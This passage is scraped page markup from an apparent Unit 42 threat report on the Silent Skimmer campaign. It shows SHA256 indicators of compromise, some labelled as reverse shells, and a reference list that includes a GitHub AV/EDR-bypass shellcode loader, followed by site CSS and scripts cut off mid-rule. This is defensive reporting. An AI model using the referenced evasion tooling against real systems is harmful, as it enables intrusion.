Strike\r\n\r\n\r\n8240d49629a558acc0426dff40c042fa989fb46159bb5971ee3c4211b68a59d0\r\nSHA256\r\nUnknown\r\n\r\n\r\na2a17e561d50f69e011598fd2e03b0376f6468609a1b2d6be9d458ee5c8b397d\r\nSHA256\r\nUnknown\r\n\r\n\r\nb1da7982199597882a2da8c45114f4cf74fed64447fca8c5f58ced24d7085c77\r\nSHA256\r\nReverse shell\r\n\r\n\r\n1c9a9732d600d975b5b44ab326d5cc99123a84d5b400a189902ff6d249a24bda\r\nSHA256\r\nReverse shell\r\n\r\n\r\n\r\nAdditional Resources\r\n\r\n \tIt\u2019s Silent Skimmer: Online Payment Scraping Campaign Shifts Targets From APAC to NALA \u2013 BlackBerry\r\n \tInto the tank with Nitrogen \u2013 Sophos News\r\n \tMixed (Native and Managed) Assemblies \u2013 Microsoft Learn\r\n \tChallenge 6: \u00e0 la mode [PDF] \u2013 Mandiant FLARE-On Challenge on mixed mode assemblies\r\n \tDon\u2019t check out! \u2013 Credit card skimming activity observed \u2013 LevelBlue\r\n \tGitHub - T4y1oR\/RingQ: \u4e00\u6b3e\u540e\u6e17\u900f\u514d\u6740\u5de5\u5177\uff0c\u52a9\u529b\u6bcf\u4e00\u4f4d\u50cf\u6211\u8fd9\u6837\u7684\u811a\u672c\u5c0f\u5b50\u5feb\u901f\u5b9e\u73b0\u514d\u6740\uff0c\u652f\u6301bypass AV\/EDR 360 \u706b\u7ed2 Windows Defender Shellcode Loader \u2013 T4y1oR on GitHub\r\n \tBlackCat ransomware shuts down in exit scam, blames the \"feds\" \u2013 Bleeping Computer\r\n \tPlaybook Of The Week - Fending Off Living Off the Land Attacks \u2013 Palo Alto Networks\r\n \tAI Skills Challenge, Primitive: Mshta.exe \u2013 Microsoft Learn\r\n \tSystem Binary Proxy Execution: Mshta, Sub-technique T1218.005 \u2013 MITRE ATT&amp;CK\r\n \tAI Skills Challenge, HTML Applications \u2013 Microsoft Learn\r\n \tReflective Code Loading, Technique T1620 - Enterprise \u2013 Techniques, MITRE ATT&amp;CK\r\n\r\n&nbsp;","publisher":{"@type":"Organization","@id":"#panworg"},"image":{"@type":"ImageObject","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/11\/11_Cybercrime_Category_1920x900-300x300.jpg","width":300,"height":300},"speakable":{"@type":"SpeakableSpecification","xPath":["\/html\/head\/title","\/html\/head\/meta[@name='description']\/@content"]},"author":[{"@type":"Person","name":"Veronika Senderovych"},{"@type":"Person","name":"Chema Garcia"},{"@type":"Person","name":"Zack Fink"}]}</script><link rel="stylesheet" id="crayon-css" href="https://unit42.paloaltonetworks.com/wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css?ver=_2.7.2_beta" media="all">
<link rel="stylesheet" id="crayon-theme-classic-css" href="https://unit42.paloaltonetworks.com/wp-content/plugins/crayon-syntax-highlighter/themes/classic/classic.css?ver=_2.7.2_beta" media="all">
<link rel="stylesheet" id="crayon-font-monaco-css" href="https://unit42.paloaltonetworks.com/wp-content/plugins/crayon-syntax-highlighter/fonts/monaco.css?ver=_2.7.2_beta" media="all">
<style id="co-authors-plus-coauthors-style-inline-css">
.wp-block-co-authors-plus-coauthors.is-layout-flow [class*=wp-block-co-authors-plus]{display:inline}

</style>
<style id="co-authors-plus-avatar-style-inline-css">
.wp-block-co-authors-plus-avatar :where(img){height:auto;max-width:100%;vertical-align:bottom}.wp-block-co-authors-plus-coauthors.is-layout-flow .wp-block-co-authors-plus-avatar :where(img){vertical-align:middle}.wp-block-co-authors-plus-avatar:is(.alignleft,.alignright){display:table}.wp-block-co-authors-plus-avatar.aligncenter{display:table;margin-inline:auto}

</style>
<style id="co-authors-plus-image-style-inline-css">
.wp-block-co-authors-plus-image{margin-bottom:0}.wp-block-co-authors-plus-image :where(img){height:auto;max-width:100%;vertical-align:bottom}.wp-block-co-authors-plus-coauthors.is-layout-flow .wp-block-co-authors-plus-image :where(img){vertical-align:middle}.wp-block-co-authors-plus-image:is(.alignfull,.alignwide) :where(img){width:100%}.wp-block-co-authors-plus-image:is(.alignleft,.alignright){display:table}.wp-block-co-authors-plus-image.aligncenter{display:table;margin-inline:auto}

</style>
<style id="safe-svg-svg-icon-style-inline-css">
.safe-svg-cover{text-align:center}.safe-svg-cover .safe-svg-inside{display:inline-block;max-width:100%}.safe-svg-cover svg{height:100%;max-height:100%;max-width:100%;width:100%}

</style>
<style id="classic-theme-styles-inline-css">
/*! This file is auto-generated */
.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}
</style>
<style id="global-styles-inline-css">
:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}
:root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}
</style>
<link rel="stylesheet" id="post-views-counter-frontend-css" href="https://unit42.paloaltonetworks.com/wp-content/plugins/post-views-counter/css/frontend.min.css?ver=1.4.7" media="all">
<link rel="stylesheet" id="wpml-legacy-post-translations-0-css" href="https://unit42.paloaltonetworks.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-post-translations/style.min.css?ver=1" media="all">
<link rel="stylesheet" id="unit42-v6-style-css" href="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/style.css?ver=1.0.0" media="all">
<link rel="stylesheet" id="unit42-v6-head-styles-css" href="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/css/head-styles.css?ver=1.0.0" media="all">
<link rel="stylesheet" id="unit42-v5-custom-styles-css" href="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/css/main.css?ver=1.0.0" media="all">
<link rel="stylesheet" id="unit42-v6-plugin-styles-css" href="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/css/plugin.css?ver=1.0.0" media="all">
<link rel="stylesheet" id="unit42-v6-custom-styles-css" href="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/css/main-redesign.css?ver=1.0.0" media="all">
<link rel="stylesheet" id="like-dislike-css" href="https://unit42.paloaltonetworks.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.css?ver=1.0.0" media="all">
<script src="https://unit42.paloaltonetworks.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script>
<script src="https://unit42.paloaltonetworks.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script>
<script id="crayon_js-js-extra">
var CrayonSyntaxSettings = {"version":"_2.7.2_beta","is_admin":"0","ajaxurl":"https:\/\/unit42.paloaltonetworks.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""};
var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"};
</script>
<script src="https://unit42.paloaltonetworks.com/wp-content/plugins/crayon-syntax-highlighter/js/min/crayon.min.js?ver=_2.7.2_beta" id="crayon_js-js"></script>
<script id="post-views-counter-frontend-js-before">
var pvcArgsFrontend = {"mode":"js","postID":137319,"requestURL":"https:\/\/unit42.paloaltonetworks.com\/wp-admin\/admin-ajax.php","nonce":"b17128cd25","dataStorage":"cookies","multisite":false,"path":"\/","domain":""};
</script>
<script src="https://unit42.paloaltonetworks.com/wp-content/plugins/post-views-counter/js/frontend.min.js?ver=1.4.7" id="post-views-counter-frontend-js"></script>
<script id="wpml-xdomain-data-js-extra">
var wpml_xdomain_data = {"css_selector":"wpml-ls-item","ajax_url":"https:\/\/unit42.paloaltonetworks.com\/wp-admin\/admin-ajax.php","current_lang":"en","_nonce":"8414e34091"};
</script>
<script src="https://unit42.paloaltonetworks.com/wp-content/plugins/sitepress-multilingual-cms/res/js/xdomain-data.js?ver=4.6.13" id="wpml-xdomain-data-js" defer="" data-wp-strategy="defer"></script>
<link rel="https://api.w.org/" href="https://unit42.paloaltonetworks.com/wp-json/"><link rel="alternate" title="JSON" type="application/json" href="https://unit42.paloaltonetworks.com/wp-json/wp/v2/posts/137319"><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://unit42.paloaltonetworks.com/xmlrpc.php?rsd">
<meta name="generator" content="WordPress 6.6.2">
<link rel="shortlink" href="https://unit42.paloaltonetworks.com/?p=137319">
<link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://unit42.paloaltonetworks.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F">
<link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://unit42.paloaltonetworks.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fsilent-skimmer-latest-campaign%2F&amp;format=xml">
<meta name="generator" content="WPML ver:4.6.13 stt:1,28;">
<meta name="google-site-verification" content="zHZtYOWm9hm4SZgsH7wqiYcOwmsAsxDUDU4UD1QxB40"><style>#wpdevart_lb_overlay{background-color:#000000;} #wpdevart_lb_overlay.wpdevart_opacity{opacity:0.8 !important;} #wpdevart_lb_main_desc{
				 -webkit-transition: opacity 0.3s ease;
				 -moz-transition: opacity 0.3s ease;
				 -o-transition: opacity 0.3s ease;
				 transition: opacity 0.3s ease;} #wpdevart_lb_information_content{
				 -webkit-transition: opacity 0.3s ease;
				 -moz-transition: opacity 0.3s ease;
				 -o-transition: opacity 0.3s ease;
				 transition: opacity 0.3s ease;}
		#wpdevart_lb_information_content{
			width:100%;	
			padding-top:0px;
			padding-bottom:0px;
		}
		#wpdevart_info_counter_of_imgs{
			    display: inline-block;
				padding-left:15px;
				padding-right:4px;
				font-size:20px;
				color:#000000;
		}
		#wpdevart_info_caption{
			    display: inline-block;
				padding-left:15px;
				padding-right:4px;
				font-size:20px;
				color:#000000;
		}
		#wpdevart_info_title{
			    display: inline-block;
				padding-left:5px;
				padding-right:5px;
				font-size:15px;
				color:#000000;
		}
		@-webkit-keyframes rotate {
			to   {-webkit-transform: rotate(360deg);}
			from  {-webkit-transform: rotate(0deg);}
		}
		@keyframes rotate {
			to   {transform: rotate(360deg);}
			from  {transform: rotate(0deg);}
		}
		#wpdevart_lb_loading_img,#wpdevart_lb_loading_img_first{
			-webkit-animation: rotate 2s linear  infinite;
    		animation: rotate 2s linear infinite;
		}
	  </style>      <link rel="icon" href="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-Unit42-180x180-1.png" sizes="32x32">
<link rel="icon" href="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-Unit42-180x180-1.png" sizes="192x192">
<link rel="apple-touch-icon" href="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-Unit42-180x180-1.png">
<meta name="msapplication-TileImage" content="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-Unit42-180x180-1.png">
<script>var $ = jQuery;</script>

    <script type="text/javascript">
    ;(function(win, doc, style, timeout) {
    var STYLE_ID = 'at-body-style';
    function getParent() {
    return doc.getElementsByTagName('head')[0];
    }
    function addStyle(parent, id, def) {
        if (!parent) {
        return;
        }
        var style = doc.createElement('style');
        style.id = id;
        style.innerHTML = def;
        parent.appendChild(style);
    }
    function removeStyle(parent, id) {
        if (!parent) {
            return;
        }
        var style = doc.getElementById(id);
        if (!style) {
            return;
        }
        parent.removeChild(style);
    }
    addStyle(getParent(), STYLE_ID, style);
    setTimeout(function() {
    removeStyle(getParent(), STYLE_ID);
    }, timeout);
    }(window, document, "body {visibility:hidden !important}", 3000));
    </script>

            <script src="https://assets.adobedtm.com/9273d4aedcd2/0d76ae0322d7/launch-425c423d843b.min.js" async=""></script>
            <script type="text/javascript" src="https://www.paloaltonetworks.com/content/dam/pan/en_US/includes/attribution.js"></script>


<script type="text/javascript">
var isIE11 = !!navigator.userAgent.match(/Trident.*rv\:11\./);
if(isIE11){
    var polyfill = 'https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/scripts/polyfill.min.js';
    document.write('<script type="text/javascript" src="'+polyfill+'">\x3C/script>');
}
    /**
 * String.prototype.replaceAll() polyfill
 * https://gomakethings.com/how-to-replace-a-section-of-a-string-with-another-one-with-vanilla-js/
 * @author Chris Ferdinandi
 * @license MIT
 */
if (!String.prototype.replaceAll) {
	String.prototype.replaceAll = function(str, newStr){
		// If a regex pattern
		if (Object.prototype.toString.call(str).toLowerCase() === '[object regexp]') {
			return this.replace(str, newStr);
		}
		// If a string
		return this.replace(new RegExp(str, 'g'), newStr);
	};
}

    /*! lozad.js - v1.16.0 - 2020-09-06 */
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):t.lozad=e()}(this,function(){"use strict";
/**
   * Detect IE browser
   * @const {boolean}
   * @private
   */var g="undefined"!=typeof document&&document.documentMode,f={rootMargin:"0px",threshold:0,load:function(t){if("picture"===t.nodeName.toLowerCase()){var e=t.querySelector("img"),r=!1;null===e&&(e=document.createElement("img"),r=!0),g&&t.getAttribute("data-iesrc")&&(e.src=t.getAttribute("data-iesrc")),t.getAttribute("data-alt")&&(e.alt=t.getAttribute("data-alt")),r&&t.append(e)}if("video"===t.nodeName.toLowerCase()&&!t.getAttribute("data-src")&&t.children){for(var a=t.children,o=void 0,i=0;i<=a.length-1;i++)(o=a[i].getAttribute("data-src"))&&(a[i].src=o);t.load()}t.getAttribute("data-poster")&&(t.poster=t.getAttribute("data-poster")),t.getAttribute("data-src")&&(t.src=t.getAttribute("data-src")),t.getAttribute("data-srcset")&&t.setAttribute("srcset",t.getAttribute("data-srcset"));var n=",";if(t.getAttribute("data-background-delimiter")&&(n=t.getAttribute("data-background-delimiter")),t.getAttribute("data-background-image"))t.style.backgroundImage="url('"+t.getAttribute("data-background-image").split(n).join("'),url('")+"')";else if(t.getAttribute("data-background-image-set")){var d=t.getAttribute("data-background-image-set").split(n),u=d[0].substr(0,d[0].indexOf(" "))||d[0];// Substring before ... 1x
u=-1===u.indexOf("url(")?"url("+u+")":u,1===d.length?t.style.backgroundImage=u:t.setAttribute("style",(t.getAttribute("style")||"")+"background-image: "+u+"; background-image: -webkit-image-set("+d+"); background-image: image-set("+d+")")}t.getAttribute("data-toggle-class")&&t.classList.toggle(t.getAttribute("data-toggle-class"))},loaded:function(){}};function A(t){t.setAttribute("data-loaded",!0)}var m=function(t){return"true"===t.getAttribute("data-loaded")},v=function(t){var e=1<arguments.length&&void 0!==arguments[1]?arguments[1]:document;return t instanceof Element?[t]:t instanceof NodeList?t:e.querySelectorAll(t)};return function(){var r,a,o=0<arguments.length&&void 0!==arguments[0]?arguments[0]:".lozad",t=1<arguments.length&&void 0!==arguments[1]?arguments[1]:{},e=Object.assign({},f,t),i=e.root,n=e.rootMargin,d=e.threshold,u=e.load,g=e.loaded,s=void 0;"undefined"!=typeof window&&window.IntersectionObserver&&(s=new IntersectionObserver((r=u,a=g,function(t,e){t.forEach(function(t){(0<t.intersectionRatio||t.isIntersecting)&&(e.unobserve(t.target),m(t.target)||(r(t.target),A(t.target),a(t.target)))})}),{root:i,rootMargin:n,threshold:d}));for(var c,l=v(o,i),b=0;b<l.length;b++)(c=l[b]).getAttribute("data-placeholder-background")&&(c.style.background=c.getAttribute("data-placeholder-background"));return{observe:function(){for(var t=v(o,i),e=0;e<t.length;e++)m(t[e])||(s?s.observe(t[e]):(u(t[e]),A(t[e]),g(t[e])))},triggerLoad:function(t){m(t)||(u(t),A(t),g(t))},observer:s}}});

</script>

<!-- <script src="https://www.google.com/recaptcha/api.js"></script>  -->

<!--  End: Scripts Migrated From Unit42-v5 -->

<script src="https://static.ads-twitter.com/uwt.js" async=""></script><script src="https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement.min.js" async=""></script><script src="https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_ActivityMap.min.js" async=""></script><script src="https://cdn.cookielaw.org/scripttemplates/202409.1.0/otBannerSdk.js" async="" type="text/javascript"></script><style id="onetrust-style">#onetrust-banner-sdk .onetrust-vendors-list-handler{cursor:pointer;color:#1f96db;font-size:inherit;font-weight:700;text-decoration:none;margin-left:5px}#onetrust-banner-sdk .onetrust-vendors-list-handler:hover{color:#1f96db}#onetrust-banner-sdk:focus{outline:2px solid #000;outline-offset:-2px}#onetrust-banner-sdk a:focus{outline:2px solid #000}#onetrust-banner-sdk #onetrust-accept-btn-handler,#onetrust-banner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler{outline-offset:1px}#onetrust-banner-sdk.ot-bnr-w-logo .ot-bnr-logo{height:64px;width:64px}#onetrust-banner-sdk .ot-tcf2-vendor-count.ot-text-bold{font-weight:700}#onetrust-banner-sdk .ot-close-icon,#onetrust-pc-sdk .ot-close-icon,#ot-sync-ntfy .ot-close-icon{background-size:contain;background-repeat:no-repeat;background-position:center;height:12px;width:12px}#onetrust-banner-sdk .powered-by-logo,#onetrust-banner-sdk .ot-pc-footer-logo a,#onetrust-pc-sdk .powered-by-logo,#onetrust-pc-sdk .ot-pc-footer-logo a,#ot-sync-ntfy .powered-by-logo,#ot-sync-ntfy .ot-pc-footer-logo a{background-size:contain;background-repeat:no-repeat;background-position:center;height:25px;width:152px;display:block;text-decoration:none;font-size:.75em}#onetrust-banner-sdk .powered-by-logo:hover,#onetrust-banner-sdk .ot-pc-footer-logo a:hover,#onetrust-pc-sdk .powered-by-logo:hover,#onetrust-pc-sdk .ot-pc-footer-logo a:hover,#ot-sync-ntfy .powered-by-logo:hover,#ot-sync-ntfy .ot-pc-footer-logo a:hover{color:#565656}#onetrust-banner-sdk h3 *,#onetrust-banner-sdk h4 *,#onetrust-banner-sdk h6 *,#onetrust-banner-sdk button *,#onetrust-banner-sdk a[data-parent-id] *,#onetrust-pc-sdk h3 *,#onetrust-pc-sdk h4 *,#onetrust-pc-sdk h6 *,#onetrust-pc-sdk button *,#onetrust-pc-sdk a[data-parent-id] *,#ot-sync-ntfy h3 *,#ot-sync-ntfy h4 *,#ot-sync-ntfy h6 *,#ot-sync-ntfy button *,#ot-sync-ntfy a[data-parent-id] *{font-size:inherit;font-weight:inherit;color:inherit}#onetrust-banner-sdk .ot-hide,#onetrust-pc-sdk .ot-hide,#ot-sync-ntfy .ot-hide{display:none!important}#onetrust-banner-sdk button.ot-link-btn:hover,#onetrust-pc-sdk button.ot-link-btn:hover,#ot-sync-ntfy button.ot-link-btn:hover{text-decoration:underline;opacity:1}#onetrust-pc-sdk .ot-sdk-row .ot-sdk-column{padding:0}#onetrust-pc-sdk .ot-sdk-container{padding-right:0}#onetrust-pc-sdk .ot-sdk-row{flex-direction:initial;width:100%}#onetrust-pc-sdk [type=checkbox]:checked,#onetrust-pc-sdk [type=checkbox]:not(:checked){pointer-events:initial}#onetrust-pc-sdk [type=checkbox]:disabled+label::before,#onetrust-pc-sdk [type=checkbox]:disabled+label:after,#onetrust-pc-sdk [type=checkbox]:disabled+label{pointer-events:none;opacity:.7}#onetrust-pc-sdk #vendor-list-content{transform:translate3d(0,0,0)}#onetrust-pc-sdk li input[type=checkbox]{z-index:1}#onetrust-pc-sdk li .ot-checkbox label{z-index:2}#onetrust-pc-sdk li .ot-checkbox input[type=checkbox]{height:auto;width:auto}#onetrust-pc-sdk li .host-title a,#onetrust-pc-sdk li .ot-host-name a,#onetrust-pc-sdk li .accordion-text,#onetrust-pc-sdk li .ot-acc-txt{z-index:2;position:relative}#onetrust-pc-sdk input{margin:3px .1ex}#onetrust-pc-sdk .pc-logo,#onetrust-pc-sdk .ot-pc-logo{height:60px;width:180px;background-position:center;background-size:contain;background-repeat:no-repeat;display:inline-flex;justify-content:center;align-items:center}#onetrust-pc-sdk .pc-logo img,#onetrust-pc-sdk .ot-pc-logo img{max-height:100%;max-width:100%}#onetrust-pc-sdk .screen-reader-only,#onetrust-pc-sdk .ot-scrn-rdr,.ot-sdk-cookie-policy .screen-reader-only,.ot-sdk-cookie-policy .ot-scrn-rdr{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}#onetrust-pc-sdk.ot-fade-in,.onetrust-pc-dark-filter.ot-fade-in,#onetrust-banner-sdk.ot-fade-in{animation-name:onetrust-fade-in;animation-duration:400ms;animation-timing-function:ease-in-out}#onetrust-pc-sdk.ot-hide{display:none!important}.onetrust-pc-dark-filter.ot-hide{display:none!important}#ot-sdk-btn.ot-sdk-show-settings,#ot-sdk-btn.optanon-show-settings{color:#68b631;border:1px solid #68b631;height:auto;white-space:normal;word-wrap:break-word;padding:.8em 2em;font-size:.8em;line-height:1.2;cursor:pointer;-moz-transition:.1s ease;-o-transition:.1s ease;-webkit-transition:1s ease;transition:.1s 